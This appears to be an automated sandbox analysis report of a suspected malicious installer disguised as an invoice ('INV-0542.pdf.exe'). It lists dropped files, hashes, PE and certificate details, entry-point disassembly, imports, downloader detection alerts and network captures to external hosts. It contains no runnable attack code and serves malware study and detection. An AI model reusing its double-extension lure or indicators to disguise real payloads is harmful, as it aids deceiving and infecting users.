                                                                                                                                                              SHA1:E1B39BD71B685C3EC9A0DD1F63521D019BD6A126
                                                                                                                                                              SHA-256:066EFC37F0302018EE5F4FE71649E62F64DD2310D2A8D00306A357DD0BD43C36
                                                                                                                                                              SHA-512:80263A59D97ED83826172858DD1230DAF55BDCFA3B583B29B0A2FD2349BCB8E8EC14E820A4F16D1D0BAEBE8AB243514A22CCD29C4397BF28BA5EC36D40456DBE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.............................z...................M............n..............m..................................S.....9.W.................................^........^....................~.................o..................... ......................... .............................................................................................................................................N.................i.................w....................t.............................................^........Z................=.....................................iD..............................................................6...................................................................q......................Q........k...........,........r............>...............'..+....................................................o..........J......s.................................................................................................x......N.............................................
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):494972
                                                                                                                                                              Entropy (8bit):1.2524594051710012
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:9ceAUHe6nPz1UkcBT5P7p3mq/1Ie5GkgjKjz:Rve6n4z7pRueo5K
                                                                                                                                                              MD5:539CFE2727A7650AF877C317CD317A90
                                                                                                                                                              SHA1:64F6F5F6EE89755BA75942B746529BC879817613
                                                                                                                                                              SHA-256:AE12461B71485C805DB15AAA75B5F70C957EBF40678D65CB6D3EF497F67AAFE3
                                                                                                                                                              SHA-512:5A54A7EBEEA0DDD0E0CE16ED2DB2C16C39777C663075A0C5CCF5C1D313E9F760B61DA06B330AD5CA228CA92716192B52D07D03F96ED695CD28DDFE36EB65FE85
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..............................].....................................................................................................................t~...............................'............j................<....u.................Q.......................................................................u...............(.......................................................................................................................k.................................m...8...........................................................s.................................S....6.........y.........X.....Y.......................!.......... ................................................................................................?................9.........................."......Y....................t.....................................................................J....B.............................................................s.....................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):499232
                                                                                                                                                              Entropy (8bit):1.256116885413473
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:F8NKKWFbUGe3N39maaBQhaN15GaLL63n4BlYQi/SZmoN79frhS6qGSi:F8N7oUnNmN7hy3n4BlYLKLlMG5
                                                                                                                                                              MD5:C458F59BAFFABE11D1AD37909B3C7079
                                                                                                                                                              SHA1:C94C42A1AB8ABB09507280B380CAD2A920C2AE93
                                                                                                                                                              SHA-256:7073DC7C9F5942B9D5FA2D6E24CEA3D4CE6BA93176DD090EF5A5A6796BCD8DA5
                                                                                                                                                              SHA-512:34CB8B88371DE84C270CEB88B6A22F325278A9AC211E813562263E8C299DA6F76E2B205D0FDF6E7B0ED033EE10B0717F89AADA4EEC3E3D80C1B9AEC89D340F71
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............................................................{........%......[........................................0..............................................{...B.....................;......................i.................................................#.............................s.................................................4.....8.........S.............................................................................p......................................j.....H....................n......................\.........................................................j................................>................................0...........?............................................-.....7=........................................i..............;..............................................................m..........................t...................................."............................................................................................._........
                                                                                                                                                              Process:C:\Users\user\Desktop\INV-0542.pdf.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):788
                                                                                                                                                              Entropy (8bit):3.330724362682758
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:8wl0ZRm/3BVkUnDypCucpANRDucLAPMJ7ScEUm1bflAL6CNbw4t2YZ/elFlSJm:8NU/BTDICucmDuCMcOn2bIqy
                                                                                                                                                              MD5:5FF6ADD217C76B85435BA0F1A7A6C9B4
                                                                                                                                                              SHA1:077A4BABC8221DC0122EC5D3B80A982F8688680A
                                                                                                                                                              SHA-256:43311E572D7A400AF9F618079BB40F7D70F2729B4E0E4A320AA04CEE29933C52
                                                                                                                                                              SHA-512:B413FC545B1BBF3758989878B345BB4A0FABD7FB96398C98EE7B4FD5A60376D2C2CC3B8A2BC9EB465FDB89781D8D22AAB03B6BADFC5E62B05574798AEF4852A0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:L..................F........................................................I....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....t.2...........tegnskriftens.esk.T............................................t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k... .......\.F.o.n.t.s.\.t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k.?.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.p.e.l.l.a.n.t.\.s.t.i.m.u.l.e.r.e.\.C.h.e.m.o.s.i.s.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                              Entropy (8bit):7.64877023008813
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:INV-0542.pdf.exe
                                                                                                                                                              File size:923'768 bytes
                                                                                                                                                              MD5:fa02056b1a21f75efabdda81219fb7db
                                                                                                                                                              SHA1:3e8dd711bfef09d2db54af75476765d85693c756
                                                                                                                                                              SHA256:23be2a96f4c15306083c180774452e11f42837e297627cd33ad5a9708953cd4c
                                                                                                                                                              SHA512:af4c4a9d7e6ede0026548136fa4b7c37f8298d055a835a56baf9795bc5b0b3a034a5e2dd2592476c3479fe8b23da338ad615144a91a61b3a47dd6bee00de8088
                                                                                                                                                              SSDEEP:24576:ZX22KSCC4VSi/kKJfaklq2E3l8Et2F2Yurik:9ylCQLJfaklc3uEtUWT
                                                                                                                                                              TLSH:AE1512453703DDA6F76212309C29C51B8B59EF3A2208B3DD2735FBBB7A72614492F606
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                                                                                                                                              Icon Hash:8ad03039793b8f46
                                                                                                                                                              Entrypoint:0x40351c
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:true
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:4
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:4
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                                                              Signature Valid:false
                                                                                                                                                              Signature Issuer:CN=Erythrophobia, O=Erythrophobia, L=Rueil-Malmaison, C=FR
                                                                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                              Error Number:-2146762487
                                                                                                                                                              Not Before, Not After
                                                                                                                                                              • 23/04/2024 05:01:05 23/04/2027 05:01:05
                                                                                                                                                              Subject Chain
                                                                                                                                                              • CN=Erythrophobia, O=Erythrophobia, L=Rueil-Malmaison, C=FR
                                                                                                                                                              Version:3
                                                                                                                                                              Thumbprint MD5:47608FE366CA4BEC8F84F14569272CA3
                                                                                                                                                              Thumbprint SHA-1:5EB83A459749C2DA570D13B8C541D087EF638E66
                                                                                                                                                              Thumbprint SHA-256:FB0CA4CFC0BFE02C2D499AAB5995E1E66A902751860BB009507CFB1C4A6DD8A4
                                                                                                                                                              Serial:75AE44FE3C953685739EA1A890C9A7C9FB3BD845
                                                                                                                                                              Instruction
                                                                                                                                                              sub esp, 000003F8h
                                                                                                                                                              push ebp
                                                                                                                                                              push esi
                                                                                                                                                              push edi
                                                                                                                                                              push 00000020h
                                                                                                                                                              pop edi
                                                                                                                                                              xor ebp, ebp
                                                                                                                                                              push 00008001h
                                                                                                                                                              mov dword ptr [esp+20h], ebp
                                                                                                                                                              mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                              call dword ptr [004080A4h]
                                                                                                                                                              mov esi, dword ptr [004080A8h]
                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                              push eax
                                                                                                                                                              mov dword ptr [esp+4Ch], ebp
                                                                                                                                                              mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                              mov dword ptr [esp+00000150h], ebp
                                                                                                                                                              mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                              call esi
                                                                                                                                                              test eax, eax
                                                                                                                                                              jne 00007F25188EEA5Ah
                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                              mov dword ptr [esp+34h], 00000114h
                                                                                                                                                              push eax
                                                                                                                                                              call esi
                                                                                                                                                              mov ax, word ptr [esp+48h]
                                                                                                                                                              mov ecx, dword ptr [esp+62h]
                                                                                                                                                              sub ax, 00000053h
                                                                                                                                                              add ecx, FFFFFFD0h
                                                                                                                                                              neg ax
                                                                                                                                                              sbb eax, eax
                                                                                                                                                              mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                              not eax
                                                                                                                                                              and eax, ecx
                                                                                                                                                              mov word ptr [esp+00000148h], ax
                                                                                                                                                              cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                              jnc 00007F25188EEA28h
                                                                                                                                                              and word ptr [esp+42h], 0000h
                                                                                                                                                              mov eax, dword ptr [esp+40h]
                                                                                                                                                              movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                              mov dword ptr [00429AD8h], eax
                                                                                                                                                              xor eax, eax
                                                                                                                                                              mov ah, byte ptr [esp+38h]
                                                                                                                                                              movzx eax, ax
                                                                                                                                                              or eax, ecx
                                                                                                                                                              xor ecx, ecx
                                                                                                                                                              mov ch, byte ptr [esp+00000148h]
                                                                                                                                                              movzx ecx, cx
                                                                                                                                                              shl eax, 10h
                                                                                                                                                              or eax, ecx
                                                                                                                                                              movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                              Programming Language:
                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x27ae0.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xe0f500x928
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              .data0xa0000x1fb380x6002e1d49b2855a89e6218e118f0c182b81False0.5026041666666666data4.044293204800279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .ndata0x2a0000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rsrc0x580000x27ae00x27c0044fcccfb09828564447b515fda1781b1False0.29796825864779874data4.41590745621256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_ICON0x583280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2519223944161836
                                                                                                                                                              RT_ICON0x68b500x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2898885852428001
                                                                                                                                                              RT_ICON0x71ff80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.34117375231053604
                                                                                                                                                              RT_ICON0x774800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.36809163911195086
                                                                                                                                                              RT_ICON0x7b6a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42064315352697096
                                                                                                                                                              RT_ICON0x7dc500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48381801125703566
                                                                                                                                                              RT_ICON0x7ecf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6187943262411347
                                                                                                                                                              RT_DIALOG0x7f1600x100dataEnglishUnited States0.5234375
                                                                                                                                                              RT_DIALOG0x7f2600x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                              RT_DIALOG0x7f3800xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                              RT_DIALOG0x7f4480x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                              RT_GROUP_ICON0x7f4a80x68dataEnglishUnited States0.7596153846153846
                                                                                                                                                              RT_VERSION0x7f5100x290MS Windows COFF PA-RISC object fileEnglishUnited States0.5121951219512195
                                                                                                                                                              RT_MANIFEST0x7f7a00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                              DLLImport
                                                                                                                                                              ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                              SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                                              ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                                              USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                                              GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                                              KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              EnglishUnited States
                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2024-11-25T18:43:40.022486+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549756172.217.19.174443TCP
                                                                                                                                                              2024-11-25T18:43:50.306241+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549780132.226.8.16980TCP
                                                                                                                                                              2024-11-25T18:43:53.368842+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549780132.226.8.16980TCP
                                                                                                                                                              2024-11-25T18:43:55.108638+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549795172.67.177.134443TCP
                                                                                                                                                              2024-11-25T18:43:57.587488+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549802132.226.8.16980TCP
                                                                                                                                                              2024-11-25T18:44:01.165637+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549812132.226.8.16980TCP
                                                                                                                                                              2024-11-25T18:44:02.858571+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549815172.67.177.134443TCP
                                                                                                                                                              2024-11-25T18:44:06.452041+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549827172.67.177.134443TCP
                                                                                                                                                              2024-11-25T18:44:09.842403+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549834172.67.177.134443TCP
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Nov 25, 2024 18:43:37.157191038 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:37.157232046 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:37.157315969 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:37.180975914 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:37.180994987 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:39.004813910 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:39.004882097 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:39.005942106 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:39.006009102 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:39.057338953 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:39.057358980 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:39.057805061 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:39.060894012 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:39.062551022 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:39.103328943 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:40.022500992 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:40.022555113 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:40.022569895 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:40.022609949 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:40.022785902 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:40.022811890 CET44349756172.217.19.174192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:40.022850037 CET49756443192.168.2.5172.217.19.174
                                                                                                                                                              Nov 25, 2024 18:43:40.272870064 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:40.272902012 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:40.272977114 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:40.273267984 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:40.273279905 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:42.074491978 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:42.074585915 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:42.083993912 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:42.084012032 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:42.084263086 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:42.084322929 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:42.084862947 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:42.131325006 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.118952036 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.119024992 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.132335901 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.132405996 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.244934082 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.245043993 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.245052099 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.245104074 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.248965025 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.249020100 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.329102039 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.329188108 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.332943916 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.332995892 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.333064079 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.333106041 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.340603113 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.340656996 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.340698004 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.340740919 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.348450899 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.348495007 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.356117010 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.356175900 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.356195927 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.356244087 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.363869905 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.363913059 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.363918066 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.363960028 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.371704102 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.371789932 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.374200106 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.374296904 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.381795883 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.381870985 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.382998943 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.383064032 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.389193058 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.389250994 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.395076990 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.395137072 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.398071051 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.398124933 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.408668995 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.408739090 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.411993980 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.412050009 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.422616959 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.422775030 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.425606966 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.425672054 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.437592983 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.437661886 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.437752008 CET44349764142.250.181.1192.168.2.5
                                                                                                                                                              Nov 25, 2024 18:43:45.437994957 CET49764443192.168.2.5142.250.181.1
                                                                                                                                                              Nov 25, 2024 18:43:45.576337099 CET44349764142.250.181.1192.168.2.5
